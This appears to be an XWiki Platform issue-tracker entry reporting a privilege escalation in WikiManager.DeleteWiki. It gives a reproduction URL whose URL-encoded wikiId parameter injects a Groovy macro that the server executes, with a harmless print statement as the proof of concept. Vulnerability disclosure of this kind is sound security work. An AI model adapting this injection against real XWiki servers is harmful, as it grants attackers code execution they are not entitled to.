Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20297

Privilege escalation (PR) from view right on WikiManager.DeleteWiki

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      Open <xwiki-host>/xwiki/bin/view/WikiManager/DeleteWiki?wikiId=%22+%2F%7D%7D+%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D where <xwiki-host> is the URL of your XWiki installation.

      Expected result:

      An error 

      Wiki [" /}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/async}}] does not exist

      is displayed.

      Actual result:

      Wiki [{0}] does not exist Hello from groovy!"/}}

      is displayed. This shows that the Groovy macro has been executed and thus demonstrates a privilege escalation from view rights on WikiManager.DeleteWiki to programming rights.

      Attachments

        Issue Links

          links to

          Web Link Github Security advisory

          Activity

            People

              mleduc Manuel Leduc
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: